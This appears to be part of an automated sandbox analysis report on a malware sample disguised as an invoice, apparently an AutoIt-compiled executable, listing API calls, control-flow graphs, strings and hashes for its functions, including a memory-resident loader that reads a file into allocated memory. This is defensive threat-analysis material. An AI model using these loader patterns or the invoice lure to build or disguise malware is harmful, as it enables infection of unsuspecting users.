                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                              • String ID: p1#v`K$v
                                                              • API String ID: 2378138488-1068180069
                                                              • Opcode ID: 6394e4084e1267b9d872b7622f6f0b5d658b2342725343dcb8753e01b885c417
                                                              • Instruction ID: 371458bd82468567bb1d7391324e3b0b58bce8422c735d69883fad88ac89733e
                                                              • Opcode Fuzzy Hash: 6394e4084e1267b9d872b7622f6f0b5d658b2342725343dcb8753e01b885c417
                                                              • Instruction Fuzzy Hash: BCC149B1A10219ABDF21DF95CC81EEEB7BDAF59300F1040AAF609F7151DB709A948F61
                                                              Function 001F3F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 001F3F86
                                                              • RegisterClassExW.USER32(00000030), ref: 001F3FB0
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001F3FC1
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 001F3FDE
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001F3FEE
                                                              • LoadIconW.USER32(000000A9), ref: 001F4004
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001F4013
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: 5a6352e2d67ae4e363c86791144b89dd3ec3671d857402c76093079254822333
                                                              • Instruction ID: 95a0e144cb7952ed068f92b78fdfe4b7dcf3ed7a33adf118d7c53846a0ce0dd4
                                                              • Opcode Fuzzy Hash: 5a6352e2d67ae4e363c86791144b89dd3ec3671d857402c76093079254822333
                                                              • Instruction Fuzzy Hash: 7C21E0B5900308AFDB00DFA5F88DBCEBBB8FB08700F50421AFA15A62A0D7B105948F91
                                                              Function 001F3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 961 1f3742-1f3762 963 1f3764-1f3767 961->963 964 1f37c2-1f37c4 961->964 965 1f3769-1f3770 963->965 966 1f37c8 963->966 964->963 967 1f37c6 964->967 968 1f382c-1f3834 PostQuitMessage 965->968 969 1f3776-1f377b 965->969 971 1f37ce-1f37d1 966->971 972 261e00-261e2e call 1f2ff6 call 20e312 966->972 970 1f37ab-1f37b3 DefWindowProcW 967->970 976 1f37f2-1f37f4 968->976 974 261e88-261e9c call 234ddd 969->974 975 1f3781-1f3783 969->975 977 1f37b9-1f37bf 970->977 978 1f37f6-1f381d SetTimer RegisterWindowMessageW 971->978 979 1f37d3-1f37d4 971->979 1006 261e33-261e3a 972->1006 974->976 1000 261ea2 974->1000 981 1f3789-1f378e 975->981 982 1f3836-1f3840 call 20eb83 975->982 976->977 978->976 983 1f381f-1f382a CreatePopupMenu 978->983 985 261da3-261da6 979->985 986 1f37da-1f37ed KillTimer call 1f3847 call 1f390f 979->986 989 261e6d-261e74 981->989 990 1f3794-1f3799 981->990 1001 1f3845 982->1001 983->976 993 261ddc-261dfb MoveWindow 985->993 994 261da8-261daa 985->994 986->976 989->970 996 261e7a-261e83 call 22a5f3 989->996 998 1f379f-1f37a5 990->998 999 261e58-261e68 call 2355bd 990->999 993->976 1002 261dac-261daf 994->1002 1003 261dcb-261dd7 SetFocus 994->1003 996->970 998->970 998->1006 999->976 1000->970 1001->976 1002->998 1007 261db5-261dc6 call 1f2ff6 1002->1007 1003->976 1006->970 1011 261e40-261e53 call 1f3847 call 1f4ffc 1006->1011 1007->976 1011->970
                                                              APIs
                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 001F37B3
                                                              • KillTimer.USER32(?,00000001), ref: 001F37DD
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001F3800
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001F380B
                                                              • CreatePopupMenu.USER32 ref: 001F381F
                                                              • PostQuitMessage.USER32(00000000), ref: 001F382E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                              • String ID: TaskbarCreated
                                                              • API String ID: 129472671-2362178303
                                                              • Opcode ID: 9667839e79b6d29c62357ff97402f8bb2ae4bdcaa37ae4ed938a1322d35a0a79
                                                              • Instruction ID: 383c6cb51b8220c072577bd5ac51b0af4ef52814d526ad59a0cc43e99aa8860f
                                                              • Opcode Fuzzy Hash: 9667839e79b6d29c62357ff97402f8bb2ae4bdcaa37ae4ed938a1322d35a0a79
                                                              • Instruction Fuzzy Hash: 164127F112424EA7DB187F78FC5EBBA3669FB00340F540715FB26921A1CB60ADB197A1
                                                              Function 001F3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 001F3E79
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 001F3E88
                                                              • LoadIconW.USER32(00000063), ref: 001F3E9E
                                                              • LoadIconW.USER32(000000A4), ref: 001F3EB0
                                                              • LoadIconW.USER32(000000A2), ref: 001F3EC2
                                                                • Part of subcall function 001F4024: LoadImageW.USER32(001F0000,00000063,00000001,00000010,00000010,00000000), ref: 001F4048
                                                              • RegisterClassExW.USER32(?), ref: 001F3F30
                                                                • Part of subcall function 001F3F53: GetSysColorBrush.USER32(0000000F), ref: 001F3F86
                                                                • Part of subcall function 001F3F53: RegisterClassExW.USER32(00000030), ref: 001F3FB0
                                                                • Part of subcall function 001F3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001F3FC1
                                                                • Part of subcall function 001F3F53: InitCommonControlsEx.COMCTL32(?), ref: 001F3FDE
                                                                • Part of subcall function 001F3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001F3FEE
                                                                • Part of subcall function 001F3F53: LoadIconW.USER32(000000A9), ref: 001F4004
                                                                • Part of subcall function 001F3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001F4013
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                              • String ID: #$0$AutoIt v3
                                                              • API String ID: 423443420-4155596026
                                                              • Opcode ID: 69c4f11fa3b400c08b933a799bf94b3bb6d304734750337861e1655df906b4a9
                                                              • Instruction ID: 5de01c80c7beb2b8e37699e232cd27d91a942f89af4387c0bed990dee79f10bc
                                                              • Opcode Fuzzy Hash: 69c4f11fa3b400c08b933a799bf94b3bb6d304734750337861e1655df906b4a9
                                                              • Instruction Fuzzy Hash: CE2162B0D14304ABCB04DFA9FC5EA9ABFF5FB48310F50461AE618A32A0D77146A48F91
                                                              Function 00E27128 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1025 e27128-e271d6 call e24b48 1028 e271dd-e27203 call e28038 CreateFileW 1025->1028 1031 e27205 1028->1031 1032 e2720a-e2721a 1028->1032 1033 e27355-e27359 1031->1033 1037 e27221-e2723b VirtualAlloc 1032->1037 1038 e2721c 1032->1038 1035 e2739b-e2739e 1033->1035 1036 e2735b-e2735f 1033->1036 1039 e273a1-e273a8 1035->1039 1040 e27361-e27364 1036->1040 1041 e2736b-e2736f 1036->1041 1042 e27242-e27259 ReadFile 1037->1042 1043 e2723d 1037->1043 1038->1033 1044 e273aa-e273b5 1039->1044 1045 e273fd-e27412 1039->1045 1040->1041 1046 e27371-e2737b 1041->1046 1047 e2737f-e27383 1041->1047 1052 e27260-e272a0 VirtualAlloc 1042->1052 1053 e2725b 1042->1053 1043->1033 1054 e273b7 1044->1054 1055 e273b9-e273c5 1044->1055 1048 e27422-e2742a 1045->1048 1049 e27414-e2741f VirtualFree 1045->1049 1046->1047 1050 e27393 1047->1050 1051 e27385-e2738f 1047->1051 1049->1048 1050->1035 1051->1050 1056 e272a2 1052->1056 1057 e272a7-e272c2 call e28288 1052->1057 1053->1033 1054->1045 1058 e273c7-e273d7 1055->1058 1059 e273d9-e273e5 1055->1059 1056->1033 1065 e272cd-e272d7 1057->1065 1061 e273fb 1058->1061 1062 e273f2-e273f8 1059->1062 1063 e273e7-e273f0 1059->1063 1061->1039 1062->1061 1063->1061 1066 e2730a-e2731e call e28098 1065->1066 1067 e272d9-e27308 call e28288 1065->1067 1073 e27322-e27326 1066->1073 1074 e27320 1066->1074 1067->1065 1075 e27332-e27336 1073->1075 1076 e27328-e2732c CloseHandle 1073->1076 1074->1033 1077 e27346-e2734f 1075->1077 1078 e27338-e27343 VirtualFree 1075->1078 1076->1075 1077->1028 1077->1033 1078->1077
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E271F9
                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E2741F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2166684470.0000000000E24000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E24000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e24000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CreateFileFreeVirtual
                                                              • String ID:
                                                              • API String ID: 204039940-0
                                                              • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                              • Instruction ID: 40a136a7e00d9ff7da8906d6ab06d6a8c3b21775052063196305f6e94d4cd9aa
                                                              • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                              • Instruction Fuzzy Hash: 9DA13671E04229EBDB14CFA4D898BEEBBB5FF48304F209159E541BB280D7759A80DF64
                                                              Function 001F49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1134 1f49fb-1f4a25 call 1fbcce RegOpenKeyExW 1137 1f4a2b-1f4a2f 1134->1137 1138 2641cc-2641e3 RegQueryValueExW 1134->1138 1139 264246-26424f RegCloseKey 1138->1139 1140 2641e5-264222 call 20f4ea call 1f47b7 RegQueryValueExW 1138->1140 1145 264224-26423b call 1f6a63 1140->1145 1146 26423d-264245 call 1f47e2 1140->1146 1145->1146 1146->1139
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 001F4A1D
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002641DB
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0026421A
                                                              • RegCloseKey.ADVAPI32(?), ref: 00264249
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$CloseOpen
                                                              • String ID: Include$Software\AutoIt v3\AutoIt
                                                              • API String ID: 1586453840-614718249
                                                              • Opcode ID: 5fd2faadc6b66e0f0777305a676766c64e045679c2291d918e77fd5f87dc603e
                                                              • Instruction ID: edb3e14727b78570a6c4ad6b840c4b246a47f80dba0c18ecc7e2cf7ecaf5d6ec
                                                              • Opcode Fuzzy Hash: 5fd2faadc6b66e0f0777305a676766c64e045679c2291d918e77fd5f87dc603e
                                                              • Instruction Fuzzy Hash: 4A119D75611109BFEB00ABA4DD86EBF7BBCEF15344F000059B606E2091EB70AE419B10
                                                              Function 001F36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1161 1f36b8-1f3728 CreateWindowExW * 2 ShowWindow * 2
                                                              APIs
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001F36E6
                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001F3707
                                                              • ShowWindow.USER32(00000000,?,?,?,?,001F3AA3,?), ref: 001F371B
                                                              • ShowWindow.USER32(00000000,?,?,?,?,001F3AA3,?), ref: 001F3724
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$CreateShow
                                                              • String ID: AutoIt v3$edit
                                                              • API String ID: 1584632944-3779509399
                                                              • Opcode ID: ff7eb7a5a8d3cb9a0a13eece32af293d51ca352eaed5593354ac9da7e70f0935
                                                              • Instruction ID: 9684548a076449102d6f6da764daefb8d73f1652df77ac9b6610426dc1c49732
                                                              • Opcode Fuzzy Hash: ff7eb7a5a8d3cb9a0a13eece32af293d51ca352eaed5593354ac9da7e70f0935
                                                              • Instruction Fuzzy Hash: 53F03A759542D07AE7306757BC1CE672E7DD7C6F20B60051ABE08A21A0C16108A5CAB0
                                                              Function 00E26EF8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1266 e26ef8-e27021 call e24b48 call e26de8 CreateFileW 1273 e27023 1266->1273 1274 e27028-e27038 1266->1274 1275 e270d8-e270dd 1273->1275 1277 e2703a 1274->1277 1278 e2703f-e27059 VirtualAlloc 1274->1278 1277->1275 1279 e2705b 1278->1279 1280 e2705d-e27074 ReadFile 1278->1280 1279->1275 1281 e27076 1280->1281 1282 e27078-e270b2 call e26e28 call e25de8 1280->1282 1281->1275 1287 e270b4-e270c9 call e26e78 1282->1287 1288 e270ce-e270d6 ExitProcess 1282->1288 1287->1288 1288->1275
                                                              APIs
                                                                • Part of subcall function 00E26DE8: Sleep.KERNELBASE(000001F4), ref: 00E26DF9
                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E27017
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2166684470.0000000000E24000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E24000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e24000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CreateFileSleep
                                                              • String ID: Z1TG6AXIQPLM9MRCBKRW
                                                              • API String ID: 2694422964-3614165976
                                                              • Opcode ID: 45f7b41b69cbcdecfed6337bc8d34a21b36d92e4db5e6852644cee32ed22db90
                                                              • Instruction ID: 0b9478215243eee5ef11507d410dad84d47d5c2f6abe77c9f0d915bb3c65b5ac
                                                              • Opcode Fuzzy Hash: 45f7b41b69cbcdecfed6337bc8d34a21b36d92e4db5e6852644cee32ed22db90
                                                              • Instruction Fuzzy Hash: 1E51BF31D04298EAEF11DBA4D805BEFBBB5AF19304F004199E658BB2C1D7B90B48CB65
                                                              Function 001F4A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 001F5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002B1148,?,001F61FF,?,00000000,00000001,00000000), ref: 001F5392
                                                                • Part of subcall function 001F49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 001F4A1D
                                                              • _wcscat.LIBCMT ref: 00262D80
                                                              • _wcscat.LIBCMT ref: 00262DB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$FileModuleNameOpen
                                                              • String ID: 8!+$\$\Include\
                                                              • API String ID: 3592542968-1039336780
                                                              • Opcode ID: e77c3ae3efd7b09de3945ee300e6c9b1c2e1da7443b11194b27089b3bb27b58a
                                                              • Instruction ID: cf7c566e1fc4bb63f484c0f50c50b945af987eab06a4995be3de8b4074883541
                                                              • Opcode Fuzzy Hash: e77c3ae3efd7b09de3945ee300e6c9b1c2e1da7443b11194b27089b3bb27b58a
                                                              • Instruction Fuzzy Hash: 7C516375424344DBC714EF59F9858AAB7F8FF69300B404A2EF648932A2DB70994CCF52
                                                              Function 001F51AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 001F522F
                                                              • _wcscpy.LIBCMT ref: 001F5283
                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 001F5293
                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00263CB0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                              • String ID: Line:
                                                              • API String ID: 1053898822-1585850449
                                                              • Opcode ID: 684b5533057940621dadaabb2e6661be0a397f998a100f6d8e776c37e0291116
                                                              • Instruction ID: d746240b7acb5c6d67b92aba8e4a65f8dc4fd918c8ef56bbffef085d05205f01
                                                              • Opcode Fuzzy Hash: 684b5533057940621dadaabb2e6661be0a397f998a100f6d8e776c37e0291116
                                                              • Instruction Fuzzy Hash: A031C171108748AFD324EB60EC46FEF77D8AF54340F404A1AF78992091EB70A698CB96
                                                              Function 001F4139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 001F41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001F39FE,?,00000001), ref: 001F41DB
                                                              • _free.LIBCMT ref: 002636B7
                                                              • _free.LIBCMT ref: 002636FE
                                                                • Part of subcall function 001FC833: __wsplitpath.LIBCMT ref: 001FC93E
                                                                • Part of subcall function 001FC833: _wcscpy.LIBCMT ref: 001FC953
                                                                • Part of subcall function 001FC833: _wcscat.LIBCMT ref: 001FC968
                                                                • Part of subcall function 001FC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 001FC978
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                              • API String ID: 805182592-1757145024
                                                              • Opcode ID: 8b73a25f22315e5bf8e8c1175937d21ee089c6d2f9024ab9fd70409dd0aae28c
                                                              • Instruction ID: 61a196ee81c4128bba9c8ae4e063b24cac57805b7c535c09305a404ecaf85efb
                                                              • Opcode Fuzzy Hash: 8b73a25f22315e5bf8e8c1175937d21ee089c6d2f9024ab9fd70409dd0aae28c
                                                              • Instruction Fuzzy Hash: 4D913F7192021DAFCF04EFA4CC919EEB7B4BF19310F50442AF916AB291DB749A65CF90
                                                              Function 001F40E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00263725
                                                              • GetOpenFileNameW.COMDLG32 ref: 0026376F
                                                                • Part of subcall function 001F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001F53B1,?,?,001F61FF,?,00000000,00000001,00000000), ref: 001F662F
                                                                • Part of subcall function 001F40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001F40C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                              • String ID: X$t3*
                                                              • API String ID: 3777226403-2637768468
                                                              • Opcode ID: f60904f66375fb8ba1f6560f70fe1030991f5401ef9d1f194d6523184c36880f
                                                              • Instruction ID: ad9d873cc8e78f9cba7f885b76de6e8fcef8ebf7c9582d71e86bd42abdfb5250
                                                              • Opcode Fuzzy Hash: f60904f66375fb8ba1f6560f70fe1030991f5401ef9d1f194d6523184c36880f
                                                              • Instruction Fuzzy Hash: 2D21D271A1028CABCF01DFD8D845BEEBBF8AF59304F004059F509A7241DFB49A898FA1
                                                              Function 002134AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __getstream.LIBCMT ref: 002134FE
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 00213539
                                                              • __wopenfile.LIBCMT ref: 00213549
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                              • String ID: <G
                                                              • API String ID: 1820251861-2138716496
